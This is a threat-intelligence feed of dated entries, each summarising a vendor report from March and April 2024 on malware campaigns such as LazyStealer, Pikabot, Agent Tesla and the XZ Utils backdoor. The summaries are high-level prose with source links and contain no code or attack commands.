- PTsecurity
- Intel Name:
- LazyStealer_analysis
- Date of Scan:
- 2024-04-09
- Impact:
- MEDIUM
- Summary:
- In the first quarter of 2024, Positive Technologies’ Expert Security Center (PT ESC) uncovered a series of attacks targeting government structures in Russia, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. The primary goal was to steal account credentials from various services used by government employees’ computers. This group, dubbed Lazy Koala due to their simple techniques and the username managing the Telegram bots with stolen data, used a malware called LazyStealer, which was straightforward but effective. All victims were directly notified about the compromise.
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Delivering_Multi_Stage_Malware_via_Invoice_Phishing
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered an intricate multi-stage attack that leverages invoice-themed phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets.
Source:
https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_increased_activity_of_the_malware_initiated_vulnerability
- Date of Scan:
- 2024-04-09
- Impact:
- MEDIUM
- Summary:
- Unit 42 Palo Alto detected an increased number of threat actors turning to malware-initiated scanning attacks. Palo Alto blog shared the details of how attackers use infected hosts for malware-based scans of their targets instead of the more traditional approach using direct scans. By launching scanning attacks from compromised hosts, attackers can accomplish the following: covering their traces, bypassing geofencing, Expanding botnets, and leveraging the resources of these compromised devices.
Source:
https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/
—
- Intel Source:
- Greynoise
- Intel Name:
- A_wild_explotation_of_D_Link_NAS_RCE
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- A remote code execution vulnerability in D-Link NAS devices is actively being exploited and is tracked under CVE-2024-3273. The vulnerability is believed to affect as many as 92,000 devices
Source:
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
—
- Intel Source:
- Harfanglab
- Intel Name:
- Raspberry_Robin_anti_emulation_trick
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- An analysis of the constantly evolving evasion capabilities employed by the Raspberry Robin malware, which has emerged as a prominent threat. The report delves into the recent variant’s unique anti-emulation techniques that leverage undocumented functions from the Windows Defender emulator’s virtual DLLs, potentially marking the first instance of such exploitation. It highlights the malware’s ability to evade detection and facilitate access for other threat actors, emphasizing the need for proactive countermeasures.
Source:
https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/
—
- Intel Source:
- CERT-AGID
- Intel Name:
- A_Constant_Was_Found_in_AgentTesla_Italian_Campaigns
- Date of Scan:
- 2024-04-09
- Impact:
- MEDIUM
- Summary:
- CERT-AGID researchers have noticed unusually high activity that is distinguished by the usage of PDF files. The distribution of AgentTesla in Italy is the focus of yet another massive operation that has been underway for the past nine months or thereabouts. As a result, it appears to have a regular monthly timing.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Boggy_Serpens_Use_of_AutodialDLL
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- Researchers at PaloAlto have found that Boggy Serpens is exploiting the AutodialDLL function in the Windows Registry. They track an Iranian threat actor with state sponsorship under the name Boggy Serpens, also known as MuddyWater or TA450.
—
- Intel Source:
- 0DAY IN {REA_TEAM}
- Intel Name:
- WarZone_RAT_Distributing_via_DBatLoader_Using_Phishing_Emails
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- Researchers from 0DAY IN have discovered that a phishing email is using DBatLoader to spread the WarZone RAT. The user received an email from the attacker with a .html file attached. The PO-2200934-KINQTE.html file appears to contain scripts and a sizable blob of base64-encoded data when viewed in Hex mode.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_that_changes_the_Notepad_Plus_Plus_plugin
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- ASEC Lab did the analysis and could confirm that “mimeTools.dll,” a basic plugin for Notepad++, had been modified and distributed. The malicious mimeTools.dll file was included in the installation file of a specific version of the Notepad++ package and mimicked as a normal package file. mimeTools is a module that performs encoding functions such as Base64.
—
- Intel Source:
- Any.Run
- Intel Name:
- Abusing_WebDAV_to_deliver_malicious_payload
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Any.Run analysts simulated the attack using a WebDAV file transfer protocol And they explained the details of how attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user’s PC using scripts or other methods.
Source:
https://any.run/cybersecurity-blog/client-side-exploitation/
—
- Intel Source:
- Antiy
- Intel Name:
- Recent_activity_of_Youshe_malware_attack
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Recently, Antiy CERT has detected attacks carried out by the “Youshe” black product targeting companies and personnel related to finance and finance. There are three main types of initial malicious files dropped by attackers: executable programs, CHM files, and commercial remote control software “Third Eye”. Most of the forged file names are related to finance and taxation, information, letters, etc.
Source:
https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis_202404.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Enhancing_Endpoint_Security_Through_Threat_Hunting
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Researchers from ISC.SANS highlight the importance of integrating threat hunting into Security Operations Teams to enhance endpoint security. Despite relying on Endpoint Detection and Response (EDR) tools, continuous fine-tuning is essential for maximum effectiveness. A case study showcases how threat hunters detected an attempt to install a browser hijacker via a deceptive .msi file, evading detection by the EDR.
—
- Intel Source:
- Trustwave
- Intel Name:
- Suspended_Domains_Show_Malevolent_Payload_for_Region_of_Latin_America
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Trustwave researchers have discovered a phishing campaign aimed at the Latin American continent. The phishing email had a ZIP attachment that, upon extraction, revealed an HTML page that, when opened, downloaded a malicious file that looked like an invoice.
—
- Intel Source:
- SCmagazine
- Intel Name:
- NordVPN_posted_as_Bing_and_spreads_SecTopRAT_malware
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Threat actors designed a fake website and a link that looked real to install NordVPN was found to lead to an installer for the remote access trojan SecTopRAT. Malwarebytes reported the malware campaign to both Microsoft, which owns Bing, and Dropbox.
Source:
https://www.scmagazine.com/news/bing-ad-posing-as-nordvpn-aims-to-spread-sectoprat-malware
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealers_Spread_via_Compromised_YouTube_Channels
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered a cyber breach involving the compromise of well-known YouTube channels, used to distribute Vidar and LummaC2 malware. These malicious tools, categorized as infostealers, are capable of harvesting sensitive user data from infected devices and facilitating the installation of additional malware.
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- A_New_Campaign_Found_That_Is_Aimed_at_People_in_South_Asia
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Researchers from CYFIRMA have discovered a sophisticated cyberthreat that is aimed at people in South Asia. Their research team discovered a malware campaign that used an executable from an SFX file that was misleading. These files are a component of a complex attack used to compromise systems and carry out malicious activities. They are embedded in the malicious binaries and fake PDF. Additional investigation suggests that Russian cybercriminals may have worked together, which raises questions about C2 infrastructure that targets people in South Asia.
—
- Intel Source:
- SOCRadar
- Intel Name:
- Mallox_ransomware_profile
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Mallox is a strain of ransomware and a group with the same name, encrypts its victims’ data and subsequently demands a ransom, typically in cryptocurrency. It is also called “TargetCompany,” “Tohnichi,” or “Fargo” ransomware and has been active since 2021.
Source:
https://socradar.io/dark-web-profile-mallox-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- Byakugan_malware_phishing_attack
- Date of Scan:
- 2024-04-06
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs collected a sample that distributed a multi-functional new malware, Byakugan, discovered in January 2024 by FortiGuard Labs. It is distributed through a PDF file and has features such as screen monitoring, screen capture, and stealing browser information. It also has anti-analysis and persistence capabilities to avoid detection. Plus researchers shared information on the infection vector, webpage, features, and protections against the malware. It also includes IOCs for organizations to check if they have been impacted by this malware.
Source:
https://www.fortinet.com/blog/threat-research/byakugan-malware-behind-a-phishing-attack
—
- Intel Source:
- Deepinstinct
- Intel Name:
- The_latest_C2_framework_attack_in_MuddyWater_activity
- Date of Scan:
- 2024-04-06
- Impact:
- MEDIUM
- Summary:
- Deepinstinct analysts dived into the details of the DarkBeatC2 attack framework, used by Iranian threat actors to target Israeli networks, and provided details on its capabilities and techniques. Also, it emphasizes the importance of sharing information and addressing vulnerabilities to prevent attacks and highlights the effectiveness of Deep Instinct’s prevention-first capabilities.
Source:
https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_Most_Recent_Round_of_Action_For_KoiLoader_or_KoiStealer
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- PaloAlto researchers created an infection in a lab environment using the most recent round of KoiLoader/KoiStealer activities. The first bank-themed lures were released on 2024-04-02 earlier this week.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Using_Binary_Ninja_to_Chop_Up_DoNex
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Researchers at INC.SANS have noted that, considering the popularity and effectiveness of LockBit, it is not surprising that more recent ransomware groups have opted to incorporate a significant portion of the LockBit code base into their own following the LockBit source code release in mid-June 2022. Darkrace, a ransomware group that emerged around the middle of June 2023, is one of LockBit’s more obvious spinoffs. Its samples closely resembled binaries from the disclosed LockBit builder, and it used a similar distribution process. Regrettably, Darkrace vanished from view when the LockBit clone’s operators chose to remove its leak site.
Source:
https://isc.sans.edu/diary/Slicing+up+DoNex+with+Binary+Ninja/30812/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Next_gen_info_stealers
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Bitdefender shared in their blog information about artificial intelligence in social media malvertising campaigns, where cybercriminals exploit AI-powered software to steal sensitive information from unsuspecting users. It also mentions the malware-as-a-service (MaaS) business model and details a particular malicious extension, Rilide Stealer V4.
—
- Intel Source:
- Sonicwall
- Intel Name:
- Updated_StrelaStealer_infostealer_targets_Europe
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Sonicwall researchers shared the analysis of the updated version of a malware called StrelaStealer, which is targeting European countries. The malware is delivered via JavaScript in email attachments and is designed to steal email account credentials from Outlook and Thunderbird.
Source:
https://blog.sonicwall.com/en-us/2024/04/updated-strelastealer-targeting-european-countries/
—
- Intel Source:
- Talos
- Intel Name:
- The_need_for_companies_to_upgrade_their_security_measures
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- The article provides a comprehensive overview of recent cybersecurity news and events. The “Top security headlines of the week” section highlights the joint charges and sanctions against a Chinese state-sponsored actor, a potential supply chain attack on Linux machines, and a backlog of vulnerabilities in the National Vulnerabilities Database. It also includes information about upcoming events and a list of prevalent malware files. The author also discusses the use of cybersecurity as an excuse for return-to-office policies and argues that security measures should remain consistent regardless of where employees are working from. The article emphasizes the need for companies to upgrade their security measures to combat the use of remote system management tools by adversaries.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-april-4-2024/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- NordVPN_Masquerade_Leads_to_Fake_Site
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Malwarebytes Labs researchers have discovered a malvertising campaign posing as the widely-used VPN service NordVPN. A malicious advertiser hijacks traffic from Bing searches, redirecting users to a fake site closely resembling the authentic NordVPN platform.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2024/04/bing-ad-for-nordvpn-leads-to-sectoprat
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_New_Threat_Group_Named_CoralRaider
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified a new threat actor known as “CoralRaider,” who they assume is financially driven and of Vietnamese descent. CoralRaider has been targeting victims in several Asian and Southeast Asian nations since at least 2023. Credentials, bank information, and social media accounts including those for businesses and advertisements are the main targets of this group.
Source:
https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hacker_Groups_Exploit_Ivanti_Security_Flaws
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Mandiant researchers have Identified several Chinese hacker groups exploiting vulnerabilities in Ivanti systems, particularly targeting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. In addition, they have observed financially driven actors exploiting CVE-2023-46805 and CVE-2024-21887 to potentially engage in cryptocurrency mining activities.
Source:
https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement
—
- Intel Source:
- SANSEC
- Intel Name:
- Vulnerability_in_Magento_Used_to_Install_Persistent_Backdoor
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- A novel technique for infection persistence on Magento servers is being employed by attackers. Researchers from Sansec have found that malware was automatically injected into the database using a well-designed layout template.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- VS_Code_Extensions_Caught_Harvesting_Sensitive_Data
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Researchers at ReversingLabs uncovered a recent malicious campaign featuring a range of malicious packages, from basic infostealers and downloaders to more sophisticated reverse shells and complex payloads. Among these, two Visual Studio Code extensions were discovered, characterized by their simple design and heavy reliance on sample code provided by Microsoft for VS Code beginners.
—
- Intel Source:
- Resecurity
- Intel Name:
- JsOutProx_Malware_Targets_Financial_Institutions
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Resecurity researchers discovered an updated iteration of JSOutProx, showcasing the malicious actors’ persistent and sophisticated tactics through the exploitation of platforms such as GitHub and GitLab. Initially identified in 2019, JSOutProx continues to pose a substantial and evolving threat, especially targeting customers of financial institutions.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Emergence_of_Latrodectus_Malware_in_Email_Threat_Campaigns
- Date of Scan:
- 2024-04-04
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have noticed a recent addition to email threat campaigns called Latrodectus. It first surfaced in late November 2023. Although its presence declined in December 2023 and January 2024, it made a resurgence in February and March 2024. Latrodectus functions as a downloader and comes equipped with several features to evade sandbox detection. While it shares similarities with IcedID, it’s a distinct malware believed to originate from the developers of IcedID.
Source:
https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
—
- Intel Source:
- Norfolkinfosec
- Intel Name:
- North_Korea_threat_group_Python_Payloads
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Norfolkinfosec researchers provided technical details of the second and third-stage malware used by a North Korean threat actor group. Their details included code analysis and names and hashes of the files involved like for example main.py which is an obfuscated Python script that downloads and executes the next two stages, while the brow.py file steals browser data and the pay.py file acts as a backdoor with keylogging capabilities.
Source:
https://norfolkinfosec.com/north-koreas-post-infection-python-payloads/
—
- Intel Source:
- Cyble
- Intel Name:
- Unveiling_the_Advanced_Tactics_of_the_Counterfeit_E_Commerce_Scheme
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Cyble researchers have identified an escalating fake e-shop campaign targeting 18 Malaysian banks with upgraded malicious applications. This campaign, which initially targeted Malaysian banks, has expanded its scope to include banks in Vietnam and Myanmar. The latest iteration of the malware introduces advanced functionalities, including screen-sharing capabilities, the use of accessibility services, and complex communication with command and control servers.
Source:
https://cyble.com/blog/elevating-the-stakes-the-enhanced-arsenal-of-the-fake-e-shop-campaign/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Effect_on_LockBit_Post_Significant_Disruption
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Trend Micro’s latest publication offers significant insights into the aftermath of Operation Cronos, shedding light on LockBit’s post-disruption strategies. Their research delves into telemetry data showcasing LockBit’s transition to a .NET core, highlighting the necessity for innovative security detection methods. Furthermore, the exposure of LockBit’s backend details has not only unveiled affiliate identities and victim information but also potentially disrupted trust and collaboration within the cybercriminal ecosystem.
Source:
https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html
—
- Intel Source:
- ASEC
- Intel Name:
- Rhadamanthys_Malware_Concealed_within_Groupware_Installer
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- ASEC researchers uncovered that Rhadamanthys malware was being distributed disguised as a groupware installer. The attackers created a fake website resembling the original and promoted it through online ads. The malware employs a stealthy technique called “indirect syscall” to evade detection by security tools, making it challenging to spot.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- XZ_Upstream_Supply_Chain_Attack
- Date of Scan:
- 2024-04-03
- Impact:
- HIGH
- Summary:
- The article discusses the CVE-2024-3094 vulnerability found in the XZ Utils library and how CrowdStrike is actively protecting its customers from potential exploitation. It provides an overview of the vulnerability, its impact, and how it can be detected and prevented using CrowdStrike’s Falcon platform. The article also offers guidance for organizations to defend against the exploitation of this vulnerability, along with relevant hashes and additional resources for further information.
Source:
https://www.crowdstrike.com/blog/cve-2024-3094-xz-upstream-supply-chain-attack/
—
- Intel Source:
- McAfee
- Intel Name:
- A_significant_change_in_the_campaigns_that_distribute_Pikabot
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- Recently, McAfee Labs observed a significant change in the campaigns that distribute Pikabot. Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.
—
- Intel Source:
- Domain tools
- Intel Name:
- The_resurgence_of_the_Manipulaters_cybercrime_group
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- The article discusses the resurgence of the “Manipulaters” team, a cybercrime group known for their spamming and phishing activities. The team uses various techniques such as DP access, “bulletproof” hosting, and forged identity documents to carry out their operations. They also rebrand and combine existing tools for their software applications, with a focus on selling spam services. The article provides specific domains, IP addresses, and email addresses associated with the Manipulaters and their use of the spamming tool HeartSender. The article also discusses the use of JavaScript and XML in HeartSender and mentions several email addresses and usernames linked to the Manipulaters. It also highlights registering nearly 500 domains associated with the email address “[email protected]” and using various aliases by the Manipulaters. The article urges businesses and consumers to remain vigilant against threat actor groups like the Manipulaters and provides resources for further information. It also includes a list of active shops and associated email addresses and usernames used by the Manipulaters. The article also delves into the history and current activities of the Manipulaters, their lack of technical sophistication, and their expansion into selling web domains. It also discusses their potential involvement in impersonating the USPS and their use of session cookie grabbers. The article highlights the Manipulaters’ operational security failures and the potential risks to their own customers. It also mentions the compromise of several PCs associated with the Manipulaters and the exposure of customer data and operational details. The article concludes by providing information on two clusters of activity associated with the Manipulaters, including usernames, email addresses, and associated domains.
—
- Intel Source:
- Mcafee
- Intel Name:
- Diverse_Campaign_Tactics_and_Payload_Analysis
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- Pikabot, a malicious backdoor, has exhibited a significant evolution in its campaign tactics, distribution methods, and infection vectors since early 2023. McAfee Labs’ recent analysis reveals distinctive campaign variations employed by Pikabot, including HTML, JavaScript, SMB share, Excel, and JAR campaigns. Each campaign utilizes unique infection chains, such as utilizing meta tag refreshes in HTML, leveraging JavaScript to execute curl.exe, exploiting the MonikerLink bug via SMB shares, embedding SMB share links in Excel files, and dropping payloads through JAR files.
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Anatomy_of_Stealers
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- This article provides a comprehensive overview of stealer malware and its impact on cybersecurity. It emphasizes the need for continuous research and investigation into the operational mechanisms and tactics used by cybercriminals. The article also highlights the importance of threat intelligence and the use of the MITRE ATT&CK framework in understanding and defending against stealer malware. It discusses the characteristics and common techniques used by these malicious programs, as well as the need for continuous education and awareness, and the use of effective security tools and practices. The article also introduces the top five most common stealers and their unique features, and discusses the use of the MITRE ATT&CK framework in analyzing and understanding these threats. It also provides a detailed analysis of the Amadey Stealer malware and its techniques, as well as the top 15 most common ASN firms in stealer malware’s IP connections. The article also discusses the prevalence of HTTP connections in stealer malware and the need for caution when considering blocking this protocol. It concludes by emphasizing the importance of integrating threat intelligence and using advanced cybersecurity solutions to detect and prevent these evolving threats.
—
- Intel Source:
- Sucuri
- Intel Name:
- Magento_Ecommerce_Malware
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- The article discusses the threat of “Magento Shoplift” malware, which targets ecommerce websites using WordPress and Magento CMS platforms. The malware is designed to steal payment information and has been found in different forms, including one that disguises as a Google Analytics script. The author, a security analyst, provides steps for mitigating the risk of this malware, such as keeping CMS software and plugins updated and using strong passwords.
—
- Intel Source:
- Bi.Zone
- Intel Name:
- Cloud_Werewolf_attacks_government_officials_in_Russia_and_Belarus
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- A cyberthreat group, identified as Cloud Werewolf, is conducting phishing campaigns targeting government employees in Russia and Belarus. The adversaries employ crafted emails mimicking legitimate documents, such as medical vouchers and federal orders, to lure victims into downloading malicious payloads. These payloads are hosted on remote servers, and their distribution is limited, allowing the threat actors to evade cybersecurity defenses within the targeted organizations.
—
- Intel Source:
- linkedin(Perception Point)
- Intel Name:
- Venom_RAT_poses_a_threat_across_various_sectors
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- This article highlights how attackers are employing phishing emails to distribute Venom RAT, a variant of Quasar RAT, across a wide array of sectors including hotels, travel, trading, finance, manufacturing, industry, and government in countries like Spain, Mexico, the United States, Colombia, Portugal, Brazil, the Dominican Republic, and Argentina. The threat actor TA558 is identified as the mastermind behind this extensive phishing campaign targeting Latin America.
Source:
https://www.linkedin.com/feed/update/urn:li:activity:7180255262807572480/
—
- Intel Source:
- Embeeresearch
- Intel Name:
- Additional_malicious_infrastructure_of_the_ACTINIUM_threat_group
- Date of Scan:
- 2024-04-02
- Impact:
- MEDIUM
- Summary:
- This report demonstrates the process of leveraging publicly available intelligence reports and passive DNS analysis tools to uncover additional malicious infrastructure associated with a specific threat actor, referred to as ACTINIUM. By analyzing patterns in domains, IP addresses, registration dates, and subdomain structures provided in an initial report by Microsoft, the analysis identifies 122 new domains exhibiting similar characteristics. The report serves as an educational guide on how analysts can expand on existing intelligence using accessible tooling and open-source data.
Source:
https://www.embeeresearch.io/uncovering-apt-infrastructure-with-passive-dns-pivoting/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Agent_Tesla_targeting_US_and_Australia
- Date of Scan:
- 2024-04-02
- Impact:
- MEDIUM
- Summary:
- Check Point Research discovered a recent malware campaign of Agent Tesla operation which targeted American and Australian organizations. Phishing campaigns mainly target organization email credentials to access entities and perform further campaigns but with the next goal, to execute the malware samples of Agent Tesla. After further investigation, CPR tracked down the activity of 2 cyber-crime actors behind Agent Tesla operations with the evidence of being connected with each other: Bignosa and Gods.
Source:
https://research.checkpoint.com/2024/agent-tesla-targeting-united-states-and-australia/
—
- Intel Source:
- Intelcorgi
- Intel Name:
- Bellingcat_Malware_analysis
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- The analysis involves an email campaign targeting the journalist group Bellingcat, delivering a malicious zip file that ultimately deploys an HTTP reverse shell. The infection chain involves a malicious zip archive, a .lnk file masquerading as a PDF, and a PowerShell script executing a reverse shell that enables data exfiltration. The campaign is attributed to a Russia-nexus threat actor based on consistently targeting organizations critical of Russia.
Source:
https://intelcorgi.com/2024/03/24/bellingcat-malware-investigation/
—
- Intel Source:
- Trend Micro
- Intel Name:
- DLL_Hijacking_and_API_Unhooking_in_the_Face_of_UNAPIMON_Malware
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro found recent cyberespionage attack attributed to Earth Freybug, a sophisticated threat group known for its espionage and financially motivated activities. The attack employs dynamic-link library (DLL) hijacking and application programming interface (API) unhooking techniques to evade detection, particularly by a newly discovered malware named UNAPIMON
Source:
https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html
—
- Intel Source:
- Moonlock
- Intel Name:
- Masked_macOS_stealer_found
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- Researchers at Moonlock Lab examined AppleScript and Bash’s payload hosted on a remote server and concluded that suspicious pieces of software have a big risk to the security and privacy of unsuspecting users. Moonlock blog details there the info about these threats posed by the Apple/Bash payload, the trojan’s modus operandi, and the potential consequences for macOS users.
Source:
https://moonlock.com/macos-stealer-apple-bash-payload
—
- Intel Source:
- Checkpoint
- Intel Name:
- Cyberattacks_in_Multiple_Countries_Using_the_Linux_Version_of_DinodasRAT
- Date of Scan:
- 2024-04-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point have been closely observing the actions of a threat actor with a Chinese connection that is targeting Southeast Asia, Africa, and South America through cyber espionage. This action closely corresponds with the findings that Trend Micro researchers made available to the public in their thorough examination of Earth Krahang, a threat actor. One noteworthy tool in this actor’s arsenal is a cross-platform backdoor called DinodasRAT, alias XDealer, which was previously seen in assaults carried out by the Chinese threat actor LuoYu.
—
- Intel Source:
- Jamf Threat Labs
- Intel Name:
- Hackers_target_macOS_users_with_malicious_ads_spreading_Stealer_Malware
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- Researchers from Jamf Threat Labs discovered that attackers are targeting individuals in the crypto industry, recognizing the potential for substantial profits. Those involved in this sector must remain highly vigilant, as public information often reveals their status as asset holders or their association with crypto-related companies, making them prime targets.
Source:
https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
—
- Intel Source:
- Malwation
- Intel Name:
- New_MuddyWater_Campaigns
- Date of Scan:
- 2024-04-01
- Impact:
- MEDIUM
- Summary:
- The MuddyWater APT group has recently launched new attacks in Israel, Africa, and Turkiye using products developed in-house and taking over third-party tools. Phishing attacks use PDF attachments with agents from services like Atera and ConnectWise. Once installed, actors gain privileges to monitor and execute files. MuddyWater is expanding tactics to reduce digital footprint, likely increasing spear-phishing via compromised accounts. Technical analysis shows tailored attack files named for targets. Compromised business accounts used to build agents, increasing victim persuasion. Remote access tools ensure persistence and capabilities like command execution and file operations. MuddyWater aligns attacks with Iran’s interests, adding techniques and using legitimate tools for anonymity.
Source:
https://www.malwation.com/blog/new-muddywater-campaigns-after-operation-swords-of-iron
—
- Intel Source:
- TheDFIRreport
- Intel Name:
- IcedID_Malware_Leveraged_in_Multi_Stage_Attack
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- In a cyber intrusion that occurred between late February and late March 2023, threat actors exploited a phishing campaign using Microsoft OneNote files to deliver the IcedID malware. The attack evolved through multiple stages, starting with IcedID deployment and persistence establishment. Subsequently, the attackers leveraged Cobalt Strike and AnyDesk to target file and backup servers, followed by data exfiltration using FileZilla and deployment of Nokoyawa ransomware.
Source:
https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- ACR_Stealer_Promotion_on_a_Well_Known_Russian_Forum
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have discovered that an ACR stealer is being promoted on a well-known Russian forum. The threat actors’ OPSEC errors allowed them to follow the compromised bots, which led us to the samples. These were all gathered at roughly the same time in late December 2023 and have less than ten VT detections between them. The timeframe aligns with the threat actor’s story, which describes how they started out operating in secret before going public.
—
- Intel Source:
- ASEC
- Intel Name:
- Deceptive_Malware_Distribution_via_Google_Ads_Tracking
- Date of Scan:
- 2024-04-01
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center (ASEC) has uncovered a sophisticated malware distribution campaign exploiting Google Ads tracking. The attackers disguise malicious software as installers for popular groupware like Notion and Slack, tricking users into downloading and executing malware onto their systems. Through a complex redirection sequence, users are led to a seemingly legitimate landing page, where malware payloads are injected into critical Windows files. This Rhadamanthys malware poses a significant threat as it operates stealthily within legitimate system processes, enabling data theft without user detection.
—
- Intel Source:
- Huntress
- Intel Name:
- Malicious_activity_on_endpoints_running_MSSQL_Server_or_MSSQL_Express
- Date of Scan:
- 2024-03-29
- Impact:
- MEDIUM
- Summary:
- Huntress SOC analysts tracked the new alerts showing malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations or as part of a larger application package installation. A recent series of incidents across three endpoints running the Fortinet Enterprise Management Server (EMS) system were initiated by alerts
Source:
https://www.huntress.com/blog/mssql-to-screenconnect
—
- Intel Source:
- Rapid7
- Intel Name:
- Technical_analysis_of_IDAT_Loader_to_download_BruteRatel
- Date of Scan:
- 2024-03-29
- Impact:
- MEDIUM
- Summary:
- This month, in two recent investigations, Rapid7’s Managed Detection & Response team observed the IDAT loader being used again. Based on the recent tactics, techniques, and procedures tracked, Rapid7’s team confirmed the activity is associated with financially motivated threat groups.
Source:
https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/
—
- Intel Source:
- Netcraft
- Intel Name:
- Attacks_on_USPS_and_global_postal_services
- Date of Scan:
- 2024-03-29
- Impact:
- LOW
- Summary:
- Chinese Phishing-as-a-Service platform ‘darcula’ targets organizations in multiple countries with sophisticated techniques using more than 20,000 phishing domains. ‘darcula’ [sic] is a new, sophisticated Phishing-as-a-Service (PhaaS) platform used on more than 20,000 phishing domains that provide cyber criminals with easy access to branded phishing campaigns.
Source:
https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps-and-global-postal-services/
—
- Intel Source:
- Adlumin
- Intel Name:
- Zero_Trust_Solution_Misconfiguration_Enables_Threat_Actors_to_Bypass_2FA
- Date of Scan:
- 2024-03-29
- Impact:
- LOW
- Summary:
